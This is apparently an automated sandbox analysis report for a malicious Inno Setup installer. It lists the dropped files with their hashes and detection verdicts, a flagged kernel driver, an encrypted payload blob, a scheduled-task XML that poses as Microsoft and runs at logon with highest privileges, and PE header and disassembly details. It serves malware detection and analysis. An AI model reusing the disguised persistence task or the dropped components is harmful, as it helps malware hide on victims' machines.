                          Preview:7z..'...9... b......@.........v'........c...Z..M..6._.}..h.J.pPD|..-............S^@..0%. ..S;U.....w'|../....G.................]0.e...I.!:...l...+.D..V.....L(>.;..&.8+..w.2(VCI.$..]I..D......N....$H.....Z.+.7=.7..VhdZ7.Lg....bP&...w..i..Yc!..O...h.._.li..Y...HcRF...5.4B.M.........B.&)..F..|.....lm.SF.$s.B]F.....o...f.$F.v..E`.....E..I......o#b...L..E@.nvq.%=...EG...2.%T.+[.Y0.z.."..$..@.....J......c.......k...o.}..`d.1e\......O..Py...%..{x..$.....x..z]@.3...,....K..)1f.Z.....=\Y..P.n;.9.vL.+.:D>6....2.J.6..3GL.X.w..D$..h\.q...[_a ./.M...0.....E..*C....r...%.#y.$.x. f....2gG.MzXsC.k0..{(.(t......f..%F.4....g^.@.1.q........"....K../..4....0b.Qm.W.X.|.+.sW.C..Q.9l(..r3.v..a ......A..t..I..AThU...&7..S..D.....4Q.......]..:.....O...82.....y.......%#...83:.W...{)........1GO.qb\...C..XY}.f..O.q...{.....R.L.@r.....k/...8%..8.q2H....P.GY..X....P..X?.&.2|....H..4]......_..a.x6Z-..6....j&...P..h.V..VebV.5Aa..T1.F.>e4(*...`|..y<......c..;0...LM

                          C:\Program Files (x86)\Windows NT\tProtect.dll

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\task.xml

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3449406240731085
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv

                          C:\Program Files (x86)\Windows NT\trash

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1741188
                          Entropy (8bit):7.9999001471583515
                          Encrypted:true
                          SSDEEP:49152:9aEhXvns3rFhdXUq1lMApKE59iYLfn1jtTO/W2Y7u4NC:bXvsbGqXMUKE59i2rSMu4NC
                          MD5:094C0AE003065FFA5629135986100DE9
                          SHA1:4E69EB9649E29070C6F9229663E20E6895EE3635
                          SHA-256:4E32486F96073839E9E674B2C372B58BC4244EAF45994E50D46BF94A3BF6B5ED
                          SHA-512:2C952EB9CFC46F4DF1A4F7E36B372C15B5361513805739E5424095C74AE6C4E1DFC0160505E1CBDFCDA73391E51ED40BC26E2BAE3E7C4CF87EA40DCF2C60F984
                          Malicious:false
                          Preview:.#........J..#..Q.JQ;...}....S..U?.S.Z.qcL.XY:#w..).R.I..Dx....r....2. .T.....iC.:.2..+^..t...tc.......8p&....|...y*c....M..q..e1Xk.4...x..F.n.F....e0....ow.......P.I@.r..'7..Fh%..E.b.....<...iw6Z.......YvY...~YT..`.2rgl.......2..7.,.guV..............c#2....W.Z.....E.$....j......m...d..#.Xq.-J..Q.v.{.q...J'G....#<(.cc=hA.2.6iy.-8N.....(.!..zd..YQ......j-^..e..*X!..5..f.M,..j..&G......q...*......3.#.xQ.3.(.{..2..n.....g../..T5q......f.........3My4......I.......2.......#k...yg.....).2y........:..)!9K..NB..?.&..b.k...N...xc.K..T....3.K.;.\...../(7.r....>.g.....w."...R..>.;8@:....0lK7>.&1p./.?b}.;._b..|[.TC...UO.W...br.Kp....6m.B...$NOL.......R7r..&/d..^.:......o.f...?@.@....t^e...@.4.I)...)-.y.K.Y....2..~...>..d.<.....n....\l|..H.d3t...L?"..l... ..>....wc....T.......L7.....j.......l...K......,yB ......N.......L_...Z.at..O</..X.~...E..y...q~G....1..=.rwR....Y.......(3m..>.R~F.U....J.w.....L.Jx|.b.....l.B.'A&....z.X..K.T.G...{9..i...e.

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ayk4ogc.wbo.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aer5lf2k.4xu.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1kvexyq.g5e.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsdel3up.ccu.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-D54U1.tmp\update.vac

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp

                          Download File
                          Process:C:\Users\user\Desktop\cVyexkZjrG.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564756542746
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:0195248B8EBF37D072592944E7488FC4
                          SHA1:9B440D54D0F9033ED9B4F153521EBE557B09E9A2
                          SHA-256:CBD84C67DBC982E19F49D77A9FB61D81ED3E3873A858BA88C8916D9513602483
                          SHA-512:5DD4297E8A7473B176108737EAF89F4514F15FFBDC57DBA33748012DD07971CBAEC9EC53C036A2681999A262FB43E8847CB5BF0DB5825B9FB4FB326F4ED7D596
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-H0N5U.tmp\update.vac

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606528
                          Entropy (8bit):7.005604268954487
                          Encrypted:false
                          SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                          MD5:1047AF726D2E233D71934EF55E635C4A
                          SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                          SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                          SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-UG9UF.tmp\cVyexkZjrG.tmp

                          Download File
                          Process:C:\Users\user\Desktop\cVyexkZjrG.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530564756542746
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:0195248B8EBF37D072592944E7488FC4
                          SHA1:9B440D54D0F9033ED9B4F153521EBE557B09E9A2
                          SHA-256:CBD84C67DBC982E19F49D77A9FB61D81ED3E3873A858BA88C8916D9513602483
                          SHA-512:5DD4297E8A7473B176108737EAF89F4514F15FFBDC57DBA33748012DD07971CBAEC9EC53C036A2681999A262FB43E8847CB5BF0DB5825B9FB4FB326F4ED7D596
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          \Device\ConDrv

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:ASCII text, with CRLF, CR line terminators
                          Category:dropped
                          Size (bytes):406
                          Entropy (8bit):5.117520345541057
                          Encrypted:false
                          SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                          MD5:9200058492BCA8F9D88B4877F842C148
                          SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                          SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                          SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                          Malicious:false
                          Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.947667484457675
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.04%
                          • Inno Setup installer (109748/4) 1.08%
                          • InstallShield setup (43055/19) 0.42%
                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                          File name:cVyexkZjrG.exe
                          File size:7'370'578 bytes
                          MD5:4e1927f742599f95f0d9450b4b8c2c80
                          SHA1:4bd20ceb48adb224d11eae63ce6f27cb974e321b
                          SHA256:5a3c5aa184e4fdb2de4530c18adb9b12ffc1a101c86cde8de13ce49d7a7a2b44
                          SHA512:bcd48db8ad3717543fd8845af2bca36bfdc56e0f8a61a6cdfcd391120479451c6f13ddc3035f9117c804fece98291d34d332f26aad810b9c6ed5fa766e96f9b6
                          SSDEEP:196608:lzGMRNXJundeS47FJ9qQNWxCfzLZghnolTi:l7RhJ+deT7FL7aWLChnolm
                          TLSH:17762223F2CBD03DE05E4B3B19B2A15490FB6A21A923AD5796ECB4ACCF351501D3E647
                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                          File Icon

                          Icon Hash:0c0c2d33ceec80aa

                          Static PE Info

                          General

                          Entrypoint:0x4a83bc
                          Entrypoint Section:.itext
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:1
                          File Version Major:6
                          File Version Minor:1
                          Subsystem Version Major:6
                          Subsystem Version Minor:1
                          Import Hash:40ab50289f7ef5fae60801f88d4541fc

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          add esp, FFFFFFA4h
                          push ebx
                          push esi
                          push edi
                          xor eax, eax
                          mov dword ptr [ebp-3Ch], eax
                          mov dword ptr [ebp-40h], eax
                          mov dword ptr [ebp-5Ch], eax
                          mov dword ptr [ebp-30h], eax
                          mov dword ptr [ebp-38h], eax
                          mov dword ptr [ebp-34h], eax
                          mov dword ptr [ebp-2Ch], eax
                          mov dword ptr [ebp-28h], eax
                          mov dword ptr [ebp-14h], eax
                          mov eax, 004A2EBCh
                          call 00007F1750A6FCE5h
                          xor eax, eax
                          push ebp
                          push 004A8AC1h
                          push dword ptr fs:[eax]
                          mov dword ptr fs:[eax], esp
                          xor edx, edx
                          push ebp
                          push 004A8A7Bh
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          mov eax, dword ptr [004B0634h]
                          call 00007F1750B0166Bh
                          call 00007F1750B011BEh
                          lea edx, dword ptr [ebp-14h]
                          xor eax, eax
                          call 00007F1750AFBE98h
                          mov edx, dword ptr [ebp-14h]
                          mov eax, 004B41F4h
                          call 00007F1750A69D93h
                          push 00000002h
                          push 00000000h
                          push 00000001h
                          mov ecx, dword ptr [004B41F4h]
                          mov dl, 01h
                          mov eax, dword ptr [0049CD14h]
                          call 00007F1750AFD1C3h
                          mov dword ptr [004B41F8h], eax
                          xor edx, edx
                          push ebp
                          push 004A8A27h
                          push dword ptr fs:[edx]
                          mov dword ptr fs:[edx], esp
                          call 00007F1750B016F3h
                          mov dword ptr [004B4200h], eax
                          mov eax, dword ptr [004B4200h]
                          cmp dword ptr [eax+0Ch], 01h
                          jne 00007F1750B083DAh
                          mov eax, dword ptr [004B4200h]
                          mov edx, 00000028h
                          call 00007F1750AFDAB8h
                          mov edx, dword ptr [004B4200h]

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                          IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          .rsrc0xcb0000x110000x11000c7a4821d78da65e97b874b4ac988cfcdFalse0.18775850183823528data3.7235953212868016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                          RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                          RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                          RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                          RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                          RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                          RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                          RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                          RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                          RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                          RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                          RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
